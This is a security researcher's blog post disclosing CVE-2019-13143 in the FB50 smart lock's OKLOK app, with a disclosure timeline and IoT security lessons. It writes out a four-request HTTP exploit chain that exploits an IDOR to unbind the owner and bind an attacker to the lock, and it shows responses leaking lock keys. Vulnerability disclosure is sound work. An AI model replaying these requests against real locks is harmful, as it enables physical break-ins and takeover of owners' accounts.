1   05 August, 2019
  2
  3Picking the FB50 smart lock (CVE-2019-13143)
  4
  5... and lessons learnt in IoT security
  6
  7   (originally posted at [1]SecureLayer7's Blog, with my edits)
  8
  9The lock
 10
 11   The lock in question is the FB50 smart lock, manufactured by Shenzhen
 12   Dragon Brother Technology Co. Ltd. This lock is sold under multiple
 13   brands across many ecommerce sites, and has over, an estimated, 15k+
 14   users.
 15
 16   The lock pairs to a phone via Bluetooth, and requires the OKLOK app
 17   from the Play/App Store to function. The app requires the user to
 18   create an account before further functionality is available. It also
 19   facilitates configuring the fingerprint, and unlocking from a range via
 20   Bluetooth.
 21
 22   We had two primary attack surfaces we decided to tackle -- Bluetooth
 23   (BLE) and the Android app.
 24
 25Via Bluetooth Low Energy (BLE)
 26
 27   Android phones have the ability to capture Bluetooth (HCI) traffic
 28   which can be enabled under Developer Options under Settings. We made
 29   around 4 "unlocks" from the Android phone, as seen in the screenshot.
 30
 31   wireshark packets
 32
 33   This is the value sent in the Write request:
 34
 35   wireshark write req
 36
 37   We attempted replaying these requests using gattool and gattacker, but
 38   that didn't pan out, since the value being written was encrypted.^[2]1
 39
 40Via the Android app
 41
 42   Reversing the app using jd-gui, apktool and dex2jar didn't get us too
 43   far since most of it was obfuscated. Why bother when there exists an
 44   easier approach -- BurpSuite.
 45
 46   We captured and played around with a bunch of requests and responses,
 47   and finally arrived at a working exploit chain.
 48
 49The exploit
 50
 51   The entire exploit is a 4 step process consisting of authenticated HTTP
 52   requests:
 53    1. Using the lock's MAC (obtained via a simple Bluetooth scan in the
 54       vicinity), get the barcode and lock ID
 55    2. Using the barcode, fetch the user ID
 56    3. Using the lock ID and user ID, unbind the user from the lock
 57    4. Provide a new name, attacker's user ID and the MAC to bind the
 58       attacker to the lock
 59
 60   This is what it looks like, in essence (personal info redacted).
 61
 62Request 1
 63
 64POST /oklock/lock/queryDevice
 65{"mac":"XX:XX:XX:XX:XX:XX"}
 66
 67   Response:
 68{
 69   "result":{
 70      "alarm":0,
 71      "barcode":"<BARCODE>",
 72      "chipType":"1",
 73      "createAt":"2019-05-14 09:32:23.0",
 74      "deviceId":"",
 75      "electricity":"95",
 76      "firmwareVersion":"2.3",
 77      "gsmVersion":"",
 78      "id":<LOCK ID>,
 79      "isLock":0,
 80      "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
 81      "lockPwd":"000000",
 82      "mac":"XX:XX:XX:XX:XX:XX",
 83      "name":"lock",
 84      "radioName":"BlueFPL",
 85      "type":0
 86   },
 87   "status":"2000"
 88}
 89
 90Request 2
 91
 92POST /oklock/lock/getDeviceInfo
 93
 94{"barcode":"https://app.oklok.com.cn/app.html?id=<BARCODE>"}
 95
 96   Response:
 97   "result":{
 98      "account":"email@some.website",
 99      "alarm":0,
100      "barcode":"<BARCODE>",
101      "chipType":"1",
102      "createAt":"2019-05-14 09:32:23.0",
103      "deviceId":"",
104      "electricity":"95",
105      "firmwareVersion":"2.3",
106      "gsmVersion":"",
107      "id":<LOCK ID>,
108      "isLock":0,
109      "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
110      "lockPwd":"000000",
111      "mac":"XX:XX:XX:XX:XX:XX",
112      "name":"lock",
113      "radioName":"BlueFPL",
114      "type":0,
115      "userId":<USER ID>
116   }
117
118Request 3
119
120POST /oklock/lock/unbind
121
122{"lockId":"<LOCK ID>","userId":<USER ID>}
123
124Request 4
125
126POST /oklock/lock/bind
127
128{"name":"newname","userId":<USER ID>,"mac":"XX:XX:XX:XX:XX:XX"}
129
130That's it! (& the scary stuff)
131
132   You should have the lock transferred to your account. The severity of
133   this issue lies in the fact that the original owner completely loses
134   access to their lock. They can't even "rebind" to get it back, since
135   the current owner (the attacker) needs to authorize that.
136
137   To add to that, roughly 15,000 user accounts' info are exposed via
138   IDOR. Ilja, a cool dude I met on Telegram, noticed locks named
139   "carlock", "garage", "MainDoor", etc.^[3]2 This is terrifying.
140
141   shudders
142
143Proof of Concept
144
145   [4]PoC Video
146
147   [5]Exploit code
148
149Disclosure timeline
150
151     * 26th June, 2019: Issue discovered at SecureLayer7, Pune
152     * 27th June, 2019: Vendor notified about the issue
153     * 2nd July, 2019: CVE-2019-13143 reserved
154     * No response from vendor
155     * 2nd August 2019: Public disclosure
156
157Lessons learnt
158
159   DO NOT. Ever. Buy. A smart lock. You're better off with the "dumb" ones
160   with keys. With the IoT plague spreading, it brings in a large attack
161   surface to things that were otherwise "unhackable" (try hacking a
162   "dumb" toaster).
163
164   The IoT security scene is rife with bugs from over 10 years ago, like
165   executable stack segments^[6]3, hardcoded keys, and poor development
166   practices in general.
167
168   Our existing threat models and scenarios have to be updated to factor
169   in these new exploitation possibilities. This also broadens the playing
170   field for cyber warfare and mass surveillance campaigns.
171
172Researcher info
173
174   This research was done at [7]SecureLayer7, Pune, IN by:
175     * Anirudh Oppiliappan (me)
176     * S. Raghav Pillai ([8]@_vologue)
177     * Shubham Chougule ([9]@shubhamtc)
178     __________________________________________________________________
179
180    1. [10]This article discusses a similar smart lock, but they broke the
181       encryption.
182    2. Thanks to Ilja Shaposhnikov (@drakylar).
183    3. [11]PDF
184
185References
186
187   1. http://blog.securelayer7.net/fb50-smart-lock-vulnerability-disclosure
188   2. https://icyphox.sh/home/icy/leet/site/build/blog/fb50/temp.html#fn:1
189   3. https://icyphox.sh/home/icy/leet/site/build/blog/fb50/temp.html#fn:2
190   4. https://twitter.com/icyphox/status/1158396372778807296
191   5. https://github.com/icyphox/pwnfb50
192   6. https://icyphox.sh/home/icy/leet/site/build/blog/fb50/temp.html#fn:3
193   7. https://securelayer7.net/
194   8. https://twitter.com/_vologue
195   9. https://twitter.com/shubhamtc
196  10. https://www.pentestpartners.com/security-blog/pwning-the-nokelock-api/
197  11. https://gsec.hitb.org/materials/sg2015/whitepapers/Lyon%20Yang%20-%20Advanced%20SOHO%20Router%20Exploitation.pdf